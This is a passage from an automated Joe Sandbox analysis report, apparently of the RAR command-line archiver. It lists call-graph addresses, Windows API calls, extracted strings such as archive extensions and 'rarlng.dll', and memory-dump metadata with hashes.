7ff695cdba59 39260 7ff695d08d00 48 API calls 39259->39260 39261 7ff695cdba66 39260->39261 39262 7ff695d08d00 48 API calls 39261->39262 39263 7ff695cdba78 39262->39263 39498 7ff695d08d38 48 API calls 39263->39498 39265 7ff695cdba85 39499 7ff695d08d88 48 API calls 39265->39499 39267 7ff695cdba92 39268 7ff695cdbacd 39267->39268 39500 7ff695d08d88 48 API calls 39267->39500 39502 7ff695d08e3c 39268->39502 39271 7ff695cdbab2 39501 7ff695d08d88 48 API calls 39271->39501 39273 7ff695cdbb33 39276 7ff695cdbb53 39273->39276 39280 7ff695d08e3c 48 API calls 39273->39280 39275 7ff695d08d00 48 API calls 39278 7ff695cdbb09 39275->39278 39277 7ff695cdbb6e 39276->39277 39281 7ff695d08e3c 48 API calls 39276->39281 39282 7ff695d08f94 126 API calls 39277->39282 39278->39273 39279 7ff695d08e3c 48 API calls 39278->39279 39279->39273 39280->39276 39281->39277 39282->39203 39284->39168 39285->39171 39286->39177 39287->39181 39290 7ff695d07a8d 39288->39290 39295 7ff695cda434 39288->39295 39289 7ff695d07aaf 39292 7ff695cf22e0 12 API calls 39289->39292 39289->39295 39290->39289 39301 7ff695d07340 157 API calls 39290->39301 39293 7ff695d07adf 39292->39293 39302 7ff695cf2440 39293->39302 39295->39190 39296 7ff695cf22e0 39295->39296 39312 7ff695cf20b4 39296->39312 39299 7ff695cf2307 39299->39190 39301->39289 39303 7ff695cf246a SetFilePointer 39302->39303 39304 7ff695cf2454 39302->39304 39305 7ff695cf24ad 39303->39305 39306 7ff695cf248d GetLastError 39303->39306 39304->39305 39310 7ff695cecd00 10 API calls 39304->39310 39305->39295 39306->39305 39308 7ff695cf2497 39306->39308 39308->39305 39311 7ff695cecd00 10 API calls 39308->39311 39313 7ff695cf2130 39312->39313 39316 7ff695cf20d0 39312->39316 39313->39299 39317 7ff695cecd00 10 API calls 39313->39317 39314 7ff695cf2102 SetFilePointer 39314->39313 39315 7ff695cf2126 GetLastError 39314->39315 39315->39313 39316->39314 39319 7ff695cda4ea 39318->39319 39320 7ff695cda4ee 39319->39320 39321 7ff695cf2440 12 API calls 39319->39321 39320->39193 39321->39320 39323 7ff695cdabbf setbuf 39322->39323 39324 7ff695d08c1c 48 API calls 39323->39324 39328 7ff695cdabf5 39324->39328 39325 7ff695cdaca7 39326 7ff695cdb4af 39325->39326 39327 7ff695cdacbf 39325->39327 39329 7ff695cdb4ff 39326->39329 39333 7ff695cf2574 126 API calls 39326->39333 39330 7ff695cdb35c 39327->39330 39331 7ff695cdacc8 39327->39331 39328->39325 39328->39326 39332 7ff695ce9be0 14 API calls 39328->39332 39334 7ff695d072c0 4 API calls 39329->39334 39335 7ff695d08eec 48 API calls 39330->39335 39336 7ff695cdacdd 39331->39336 39343 7ff695cdad60 39331->39343 39370 7ff695cdaea7 39331->39370 39337 7ff695cdac34 39332->39337 39333->39329 39334->39343 39338 7ff695cdb395 39335->39338 39339 7ff695cdace6 39336->39339 39340 7ff695cdad68 39336->39340 39341 7ff695ce90b8 75 API calls 39337->39341 39342 7ff695cdb3ad 39338->39342 39527 7ff695cd9e2c 48 API calls 39338->39527 39339->39343 39509 7ff695d08eec 39339->39509 39345 7ff695d08eec 48 API calls 39340->39345 39344 7ff695cdac8f 39341->39344 39348 7ff695d08eec 48 API calls 39342->39348 39347 7ff695d2a610 _handle_error 8 API calls 39343->39347 39344->39325 39355 7ff695cf2574 126 API calls 39344->39355 39351 7ff695cdad9c 39345->39351 39352 7ff695cdb52b 39347->39352 39349 7ff695cdb3d4 39348->39349 39353 7ff695cdb3e6 39349->39353 39357 7ff695d08eec 48 API calls 39349->39357 39356 7ff695d08eec 48 API calls 39351->39356 39352->39203 39361 7ff695d08eec 48 API calls 39353->39361 39355->39325 39359 7ff695cdada9 39356->39359 39357->39353 39358 7ff695d08eec 48 API calls 39362 7ff695cdad31 39358->39362 39360 7ff695d08eec 48 API calls 39359->39360 39363 7ff695cdadb5 39360->39363 39364 7ff695cdb451 39361->39364 39365 7ff695d08eec 48 API calls 39362->39365 39366 7ff695d08eec 48 API calls 39363->39366 39367 7ff695cdb471 39364->39367 39374 7ff695d08eec 48 API calls 39364->39374 39368 7ff695cdad46 39365->39368 39369 7ff695cdadc2 39366->39369 39372 7ff695cdb486 39367->39372 39375 7ff695d08e3c 48 API calls 39367->39375 39371 7ff695d08f94 126 API calls 39368->39371 39373 7ff695d08d00 48 API calls 39369->39373 39378 7ff695cdafda 39370->39378 39517 7ff695cd9b64 48 API calls _handle_error 39370->39517 39371->39343 39376 7ff695d08f94 126 API calls 39372->39376 39377 7ff695cdadcf 39373->39377 39374->39367 39375->39372 39376->39343 39379 7ff695ce90b8 75 API calls 39377->39379 39386 7ff695cdaff2 39378->39386 39518 7ff695cd9d98 48 API calls 39378->39518 39382 7ff695cdae22 39379->39382 39383 7ff695d08e3c 48 API calls 39382->39383 39384 7ff695cdae33 39383->39384 39385 7ff695d08e3c 48 API calls 39384->39385 39389 7ff695cdae48 39385->39389 39388 7ff695cdb02b 39386->39388 39519 7ff695cd9efc 48 API calls _handle_error 39386->39519 39387 7ff695cdb0af 39392 7ff695cdb0c8 39387->39392 39521 7ff695cda1a0 48 API calls 2 library calls 39387->39521 39388->39387 39520 7ff695cda2c8 48 API calls 39388->39520 39396 7ff695d19ce4 8 API calls 39389->39396 39394 7ff695cdb0e2 39392->39394 39522 7ff695cda350 48 API calls _handle_error 39392->39522 39397 7ff695d08eec 48 API calls 39394->39397 39398 7ff695cdae60 39396->39398 39400 7ff695cdb0fc 39397->39400 39399 7ff695d19b70 8 API calls 39398->39399 39401 7ff695cdae6d 39399->39401 39402 7ff695d08eec 48 API calls 39400->39402 39403 7ff695d08e3c 48 API calls 39401->39403 39404 7ff695cdb109 39402->39404 39405 7ff695cdae80 39403->39405 39406 7ff695cdb11f 39404->39406 39408 7ff695d08eec 48 API calls 39404->39408 39407 7ff695d08f94 126 API calls 39405->39407 39513 7ff695d08e94 39406->39513 39407->39343 39408->39406 39411 7ff695d08eec 48 API calls 39412 7ff695cdb147 39411->39412 39413 7ff695d08e94 48 API calls 39412->39413 39414 7ff695cdb15f 39413->39414 39415 7ff695d08eec 48 API calls 39414->39415 39418 7ff695cdb16c 39415->39418 39416 7ff695cdb18a 39417 7ff695cdb1a9 39416->39417 39524 7ff695d08d88 48 API calls 39416->39524 39420 7ff695d08e94 48 API calls 39417->39420 39418->39416 39523 7ff695d08d88 48 API calls 39418->39523 39422 7ff695cdb1bc 39420->39422 39423 7ff695d08eec 48 API calls 39422->39423 39424 7ff695cdb1d6 39423->39424 39426 7ff695cdb1e9 39424->39426 39525 7ff695cdc3c8 CharLowerW CharUpperW 39424->39525 39426->39426 39427 7ff695d08eec 48 API calls 39426->39427 39428 7ff695cdb21f 39427->39428 39429 7ff695d08e3c 48 API calls 39428->39429 39430 7ff695cdb230 39429->39430 39431 7ff695cdb247 39430->39431 39432 7ff695d08e3c 48 API calls 39430->39432 39433 7ff695d08f94 126 API calls 39431->39433 39432->39431 39434 7ff695cdb278 39433->39434 39434->39343 39526 7ff695d070d8 4 API calls 2 library calls 39434->39526 39528 7ff695d08f28 39436->39528 39439 7ff695ce90b8 39440 7ff695ce9123 39439->39440 39453 7ff695ce91a9 39439->39453 39440->39453 39546 7ff695d17e74 39440->39546 39441 7ff695d2a610 _handle_error 8 API calls 39443 7ff695cdb66e 39441->39443 39455 7ff695cf2574 39443->39455 39445 7ff695d1d840 WideCharToMultiByte 39446 7ff695ce9157 39445->39446 39447 7ff695ce91c4 39446->39447 39448 7ff695ce916a 39446->39448 39446->39453 39565 7ff695ce9338 12 API calls _handle_error 39447->39565 39450 7ff695ce916f 39448->39450 39451 7ff695ce91ab 39448->39451 39450->39453 39550 7ff695ce98b0 39450->39550 39564 7ff695ce951c 71 API calls _handle_error 39451->39564 39453->39441 39456 7ff695cf25a5 39455->39456 39457 7ff695cf259e 39455->39457 39458 7ff695cf25ab GetStdHandle 39456->39458 39463 7ff695cf25ba 39456->39463 39457->39201 39458->39463 39459 7ff695cf2619 WriteFile 39459->39463 39460 7ff695cf25cf WriteFile 39461 7ff695cf260b 39460->39461 39460->39463 39461->39460 39461->39463 39462 7ff695cf2658 GetLastError 39462->39463 39463->39457 39463->39459 39463->39460 39463->39462 39468 7ff695cf2721 39463->39468 39630 7ff695cf3144 9 API calls 2 library calls 39463->39630 39631 7ff695cecf34 10 API calls 39463->39631 39632 7ff695cec95c 126 API calls 39463->39632 39465 7ff695cf2684 SetLastError 39465->39463 39633 7ff695cecf14 10 API calls 39468->39633 39471 7ff695cd161c 48 API calls 39470->39471 39472 7ff695cdb719 39471->39472 39473 7ff695d08d38 48 API calls 39472->39473 39473->39224 39474->39226 39475->39227 39476->39229 39478 7ff695d09131 39477->39478 39479 7ff695d08fcf 39477->39479 39478->39203 39486 7ff695d0905d 39479->39486 39634 7ff695ceca6c 48 API calls 3 library calls 39479->39634 39480 7ff695cd161c 48 API calls 39481 7ff695d090e0 39480->39481 39481->39478 39482 7ff695cf2574 126 API calls 39481->39482 39482->39478 39484 7ff695d0904c 39635 7ff695ceca40 61 API calls _CxxThrowException 39484->39635 39486->39480 39486->39481 39487->39235 39489 7ff695cdb8f8 CharToOemA 39488->39489 39489->39242 39490->39239 39491->39245 39492->39247 39493->39249 39494->39251 39495->39255 39496->39256 39497->39259 39498->39265 39499->39267 39500->39271 39501->39268 39503 7ff695cd161c 48 API calls 39502->39503 39504 7ff695cdbaf2 39503->39504 39504->39273 39504->39275 39504->39278 39505->39214 39506->39217 39507->39219 39508->39202 39510 7ff695d08efc 39509->39510 39511 7ff695d08d00 48 API calls 39510->39511 39512 7ff695cdad24 39510->39512 39511->39510 39512->39358 39515 7ff695d08eac 39513->39515 39514 7ff695d08d00 48 API calls 39514->39515 39515->39514 39516 7ff695cdb137 39515->39516 39516->39411 39517->39378 39518->39386 39519->39388 39520->39387 39521->39392 39522->39394 39523->39416 39524->39417 39525->39426 39526->39343 39527->39342 39531 7ff695cd161c 39528->39531 39530 7ff695cdb601 39530->39201 39530->39202 39530->39439 39532 7ff695cd1640 39531->39532 39541 7ff695cd16aa __BuildCatchObjectHelper 39531->39541 39533 7ff695cd166d 39532->39533 39542 7ff695ceca6c 48 API calls 3 library calls 39532->39542 39535 7ff695cd16d4 39533->39535 39536 7ff695cd168e 39533->39536 39535->39541 39545 7ff695cecb64 8 API calls 39535->39545 39536->39541 39544 7ff695cecb64 8 API calls 39536->39544 39537 7ff695cd1661 39543 7ff695cecb64 8 API calls 39537->39543 39541->39530 39542->39537 39547 7ff695ce9143 39546->39547 39548 7ff695d17e95 39546->39548 39547->39445 39549 7ff695d17ec8 68 API calls 39548->39549 39549->39547 39554 7ff695ce9920 39550->39554 39560 7ff695ce9b45 39550->39560 39551 7ff695d2a610 _handle_error 8 API calls 39552 7ff695ce9b61 39551->39552 39552->39453 39555 7ff695ce996d 39554->39555 39556 7ff695ce9b75 39554->39556 39566 7ff695d17da8 39554->39566 39555->39555 39573 7ff695cea0f4 39555->39573 39557 7ff695d17f24 68 API calls 39556->39557 39562 7ff695ce9acb 39557->39562 39559 7ff695ce99d0 39589 7ff695d17f24 39559->39589 39560->39551 39562->39560 39603 7ff695d14ea8 8 API calls _handle_error 39562->39603 39564->39453 39565->39453 39567 7ff695d17e74 68 API calls 39566->39567 39568 7ff695d17ddc 39567->39568 39569 7ff695d17e74 68 API calls 39568->39569 39570 7ff695d17def 39569->39570 39571 7ff695d2a610 _handle_error 8 API calls 39570->39571 39572 7ff695d17e43 39571->39572 39572->39554 39577 7ff695cea15c __BuildCatchObjectHelper 39573->39577 39574 7ff695cea358 39626 7ff695d2a774 8 API calls __report_securityfailure 39574->39626 39576 7ff695cea352 39625 7ff695d2a774 8 API calls __report_securityfailure 39576->39625 39577->39574 39577->39576 39580 7ff695cea192 39577->39580 39581 7ff695cea34d 39577->39581 39579 7ff695cea35e 39604 7ff695ce9dd8 39580->39604 39624 7ff695d2a774 8 API calls __report_securityfailure 39581->39624 39584 7ff695cea1d9 39585 7ff695ce9dd8 8 API calls 39584->39585 39586 7ff695cea2f1 39584->39586 39585->39584 39587 7ff695d2a610 _handle_error 8 API calls 39586->39587 39588 7ff695cea33b 39587->39588 39588->39559 39590 7ff695d17f5e 39589->39590 39591 7ff695d17fb5 39589->39591 39590->39591 39592 7ff695d1b3f0 10 API calls 39590->39592 39593 7ff695d1805c GetCurrentProcessId 39591->39593 39597 7ff695d17ff1 39591->39597 39594 7ff695d17f72 39592->39594 39595 7ff695d18034 39593->39595 39594->39591 39596 7ff695d17f7e GetProcAddressForCaller GetProcAddress 39594->39596 39595->39562 39596->39591 39597->39595 39627 7ff695ceca6c 48 API calls 3 library calls 39597->39627 39599 7ff695d1801f 39628 7ff695cecda4 10 API calls 2 library calls 39599->39628 39601 7ff695d18027 39629 7ff695ceca40 61 API calls _CxxThrowException 39601->39629 39603->39560 39605 7ff695ce9e46 39604->39605 39609 7ff695ce9e6e __scrt_fastfail 39604->39609 39606 7ff695d19ce4 8 API calls 39605->39606 39607 7ff695ce9e5e 39606->39607 39610 7ff695d19b70 8 API calls 39607->39610 39608 7ff695d19ce4 8 API calls 39612 7ff695ce9f97 39608->39612 39611 7ff695ce9e85 39609->39611 39613 7ff695d19ce4 8 API calls 39609->39613 39610->39609 39611->39608 39614 7ff695d19b70 8 API calls 39612->39614 39613->39611 39617 7ff695ce9fa8 __scrt_fastfail 39614->39617 39615 7ff695ce9fb4 39616 7ff695d19ce4 8 API calls 39615->39616 39619 7ff695cea0bb 39616->39619 39617->39615 39618 7ff695d19ce4 8 API calls 39617->39618 39618->39615 39620 7ff695d19b70 8 API calls 39619->39620 39621 7ff695cea0c9 39620->39621 39622 7ff695d2a610 _handle_error 8 API calls 39621->39622 39623 7ff695cea0d8 39622->39623 39623->39584 39624->39576 39625->39574 39626->39579 39627->39599 39628->39601 39629->39595 39630->39465 39632->39463 39634->39484 39635->39486 39636 7ff695cd3e71 39637 7ff695cd3e81 39636->39637 39638 7ff695cd3e89 39636->39638 39647 7ff695d29a14 49 API calls 39637->39647 39640 7ff695cd3edd 39638->39640 39641 7ff695cd3ea3 39638->39641 39642 7ff695d2a610 _handle_error 8 API calls 39640->39642 39648 7ff695cf331c 48 API calls 2 library calls 39641->39648 39644 7ff695cd3eef 39642->39644 39645 7ff695cd3eab 39645->39640 39649 7ff695cd63e8 8 API calls 2 library calls 39645->39649 39647->39638 39648->39645 39649->39640 39650 7ff695d32450 39657 7ff695d33734 39650->39657 39652 7ff695d32455 39653 7ff695d36998 fflush LeaveCriticalSection 39652->39653 39654 7ff695d32460 39653->39654 39655 7ff695d3246c 39654->39655 39656 7ff695d32488 11 API calls 39654->39656 39656->39655 39662 7ff695d35630 35 API calls 3 library calls 39657->39662 39661 7ff695d3373f 39663 7ff695d34a1c 35 API calls abort 39661->39663 39662->39661 39664 7ff695cd7a5b 39665 7ff695cd7a60 39664->39665 39666 7ff695ce9be0 14 API calls 39665->39666 39668 7ff695cd7af7 39665->39668 39666->39668 39667 7ff695cd7bda 39670 7ff695cdb540 147 API calls 39667->39670 39668->39667 39697 7ff695cf1e1c GetFileTime 39668->39697 39671 7ff695cd7bf8 39670->39671 39674 7ff695cd7c3e 39671->39674 39698 7ff695d29b98 216 API calls 3 library calls 39671->39698 39673 7ff695cdb540 147 API calls 39676 7ff695cd7c9c 39673->39676 39674->39673 39675 7ff695cd7f89 39676->39675 39699 7ff695cf6378 39676->39699 39678 7ff695cd7cd7 39679 7ff695cf6378 4 API calls 39678->39679 39681 7ff695cd7cf3 39679->39681 39680 7ff695cd7de1 39687 7ff695cd7e4e 39680->39687 39704 7ff695d098dc 39680->39704 39681->39680 39683 7ff695cd7d38 39681->39683 39684 7ff695cd7d59 39681->39684 39686 7ff695d2a444 new 4 API calls 39683->39686 39685 7ff695d2a444 new 4 API calls 39684->39685 39691 7ff695cd7d42 std::bad_alloc::bad_alloc 39685->39691 39686->39691 39710 7ff695cd1204 48 API calls 39687->39710 39689 7ff695cd7eb3 39692 7ff695cd7edb 39689->39692 39711 7ff695d09680 39689->39711 39691->39680 39703 7ff695d2ba34 RtlPcToFileHeader RaiseException 39691->39703 39717 7ff695cf6424 8 API calls _handle_error 39692->39717 39695 7ff695cd7f56 39696 7ff695cdb540 147 API calls 39695->39696 39696->39675 39697->39667 39698->39674 39700 7ff695cf63a0 39699->39700 39701 7ff695cf6396 39699->39701 39700->39678 39702 7ff695d2a444 new 4 API calls 39701->39702 39702->39700 39703->39680 39705 7ff695d09926 39704->39705 39706 7ff695d0993c 39704->39706 39708 7ff695ce90b8 75 API calls 39705->39708 39707 7ff695ce90b8 75 API calls 39706->39707 39709 7ff695d09934 39707->39709 39708->39709 39709->39687 39710->39689 39715 7ff695d096a4 39711->39715 39712 7ff695d097d7 39713 7ff695cf2574 126 API calls 39713->39715 39715->39712 39715->39713 39716 7ff695d29b98 216 API calls 39715->39716 39718 7ff695cf6498 72 API calls new 39715->39718 39716->39715 39717->39695 39718->39715 39719 7ff695d1bb70 39722 7ff695d1bb80 39719->39722 39731 7ff695d1bae8 39722->39731 39724 7ff695d1bb79 39725 7ff695d1bb97 39725->39724 39736 7ff695ce1690 39725->39736 39727 7ff695d1bbc8 SetEvent 39728 7ff695d1bbd5 LeaveCriticalSection 39727->39728 39729 7ff695d1bae8 67 API calls 39728->39729 39729->39725 39740 7ff695d1b974 WaitForSingleObject 39731->39740 39734 7ff695d1bb16 EnterCriticalSection LeaveCriticalSection 39735 7ff695d1bb12 39734->39735 39735->39725 39737 7ff695ce16c2 EnterCriticalSection 39736->39737 39738 7ff695ce16a4 39736->39738 39737->39727 39737->39728 39738->39737 39748 7ff695ce1180 39738->39748 39741 7ff695d1b9b7 39740->39741 39742 7ff695d1b986 GetLastError 39740->39742 39741->39734 39741->39735 39746 7ff695ceca6c 48 API calls 3 library calls 39742->39746 39744 7ff695d1b9a6 39747 7ff695ceca40 61 API calls _CxxThrowException 39744->39747 39746->39744 39747->39741 39749 7ff695ce11ab 39748->39749 39757 7ff695ce11b0 39748->39757 39758 7ff695ce17c8 216 API calls 2 library calls 39749->39758 39751 7ff695ce166a 39751->39738 39752 7ff695d06e90 216 API calls 39752->39757 39753 7ff695d06d38 216 API calls 39753->39757 39754 7ff695d06fe8 216 API calls 39754->39757 39755 7ff695ce1080 48 API calls 39755->39757 39757->39751 39757->39752 39757->39753 39757->39754 39757->39755 39759 7ff695ce17c8 216 API calls 2 library calls 39757->39759 39758->39757 39759->39757 39760 7ff695d39c74 39761 7ff695d39c7c 39760->39761 39762 7ff695d39cbb 39761->39762 39763 7ff695d39cac 39761->39763 39766 7ff695d39cc5 39762->39766 39782 7ff695d3ce08 32 API calls 2 library calls 39762->39782 39781 7ff695d34f3c 15 API calls _set_errno_from_matherr 39763->39781 39769 7ff695d34b8c 39766->39769 39768 7ff695d39cb1 __scrt_fastfail 39770 7ff695d34bab 39769->39770 39771 7ff695d34ba1 39769->39771 39773 7ff695d34bb0 39770->39773 39776 7ff695d34bb7 __vcrt_getptd_noexit 39770->39776 39783 7ff695d34ab4 39771->39783 39774 7ff695d34a74 __vcrt_getptd_noexit 15 API calls 39773->39774 39778 7ff695d34ba9 39774->39778 39775 7ff695d34bf6 39790 7ff695d34f3c 15 API calls _set_errno_from_matherr 39775->39790 39776->39775 39779 7ff695d34be0 RtlReAllocateHeap 39776->39779 39780 7ff695d336c0 new 2 API calls 39776->39780 39778->39768 39779->39776 39779->39778 39780->39776 39781->39768 39782->39766 39784 7ff695d34aff 39783->39784 39788 7ff695d34ac3 __vcrt_getptd_noexit 39783->39788 39791 7ff695d34f3c 15 API calls _set_errno_from_matherr 39784->39791 39786 7ff695d34ae6 RtlAllocateHeap 39787 7ff695d34afd 39786->39787 39786->39788 39787->39778 39788->39784 39788->39786 39789 7ff695d336c0 new 2 API calls 39788->39789 39789->39788 39790->39778 39791->39787 39792 7ff695d1a924 39793 7ff695d1a949 sprintf 39792->39793 39794 7ff695d1a97f CompareStringA 39793->39794
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                                                                    • API String ID: 0-1628410872
                                                                                                                                                                                                                                                                    • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                                                    • Instruction ID: 78d6b66303eab75ad7583c88b0169c56b6ad288190d7098fe5d1b545b1b00b6d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30C2BF63D1C182C1EA749B24A1471BD26F1EB01F94F5881B9EA4ACB2C5DFADBD8CC354
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                                                    • API String ID: 0-1660254149
                                                                                                                                                                                                                                                                    • Opcode ID: 1193c66867ffe3842d3fab37fbdef0c8ab0e0f25f8e32a752ddbcdc47c50b0ea
                                                                                                                                                                                                                                                                    • Instruction ID: fc08128b26357f783fa3d838ee7723fd9cc5c80b711c12878c689a4edb92c45b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1193c66867ffe3842d3fab37fbdef0c8ab0e0f25f8e32a752ddbcdc47c50b0ea
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83E27A27A09AC2C9EB30DB25D8402FD27F1FB85B88F4541BADA4D8B696DF39D945C300

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D14AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF695CECC90), ref: 00007FF695D14AF5
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,00007FF695D07E7D), ref: 00007FF695D1492E
                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,00007FF695D07E7D), ref: 00007FF695D1496A
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,?,?,00007FF695D07E7D), ref: 00007FF695D14993
                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00007FF695D07E7D), ref: 00007FF695D1499F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                                                    • String ID: rarlng.dll
                                                                                                                                                                                                                                                                    • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                                                    • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                                                                    • Instruction ID: d0c3cd362ea0f65bbec59b8c8e10c821b133fb01fb46b1a5a243623ffd72981c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32316131619A42C5FB749F21E8402E933E0FB45B84F8062B5EA8D87694DF3CD94ECB44

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF4736
                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF476B
